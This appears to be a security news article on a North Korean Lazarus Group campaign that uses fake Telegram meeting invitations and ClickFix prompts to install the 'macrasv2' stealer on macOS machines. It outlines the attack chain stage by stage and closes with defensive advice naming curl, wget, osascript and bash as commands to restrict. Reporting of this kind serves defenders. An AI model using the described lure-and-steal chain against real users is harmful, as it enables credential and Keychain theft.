Lazarus Group Deploys New macOS Malware 'MacRasv2' via ClickFix Attacks on Telegram
North Korea's Lazarus Group is targeting macOS users in the FinTech and cryptocurrency sectors with a new malware kit delivered through ClickFix social engineering attacks on Telegram.
North Korea's Lazarus Group has launched a new campaign targeting macOS users in the FinTech and cryptocurrency sectors, using ClickFix social engineering attacks to deliver a novel malware kit that includes a stealer dubbed 'macrasv2'. The research, published on April 21 by security vendor Any.Run and offensive security expert Mauro Eldritch, details a sophisticated attack chain that begins with fake meeting invitations on Telegram and ends with the exfiltration of credentials, browser sessions, and macOS Keychain data.
The attack chain starts when a Lazarus operative contacts a business leader on Telegram, often using a compromised account belonging to a colleague or known contact. The attacker sends a fake Zoom, Microsoft Teams, or Google Meet invitation under the pretense of a business opportunity or job offer. When the target joins the call, they are prompted to enter a command to fix connection issues—a classic ClickFix technique that bypasses traditional security controls because the user voluntarily executes the command.
Once the user enters the command, malware is downloaded as a macOS application .bin file, typically named something innocuous like 'teamsSDK.bin'. This first-stage application installs a second-stage binary and displays a fake 'software updated' message to maintain the user's trust. The next component is a system profiler that connects to attacker-hosted command-and-control (C2) infrastructure, followed by a persistence mechanism that re-invokes the malware kit at every login.
The primary payload, 'macrasv2', is a stealer that consolidates previously collected data—including browser extension data, stored credentials, cookies, and macOS Keychain entries—into a temporary directory for exfiltration via Telegram. After exfiltration, the malware runs a self-deletion script to cover its tracks. Despite the sophistication of the attack chain, Eldritch noted that macrasv2 is 'badly written,' with several unimplemented or incorrectly implemented components, infinite loops that could expose its presence through resource starvation, and operational security weaknesses including exposed Telegram bot tokens and unauthenticated C2 endpoints.
The campaign specifically targets organizations with a substantial reliance on macOS devices, particularly in FinTech and cryptocurrency sectors. Any.Run CEO Aleksey Lapshin emphasized that macOS users should be trained out of the 'illusion of safety' many have based on the historical belief that 'Macs don't get malware.' He recommended that organizations log and restrict high-risk commands like curl, wget, osascript, and bash on endpoints, and feed ClickFix commands into EDR rules and execution policies.
This campaign underscores the growing trend of nation-state actors adopting social engineering techniques that bypass technical controls by exploiting human trust. As Lapshin noted, 'Attackers always look for the cheapest entry point with the highest hit rate. Breaking through the outer moat of enterprise security gets more expensive every year, so they're picking new paths—and the cheapest path right now is one where the attacker is literally the user, voluntarily executing commands on their own machine.'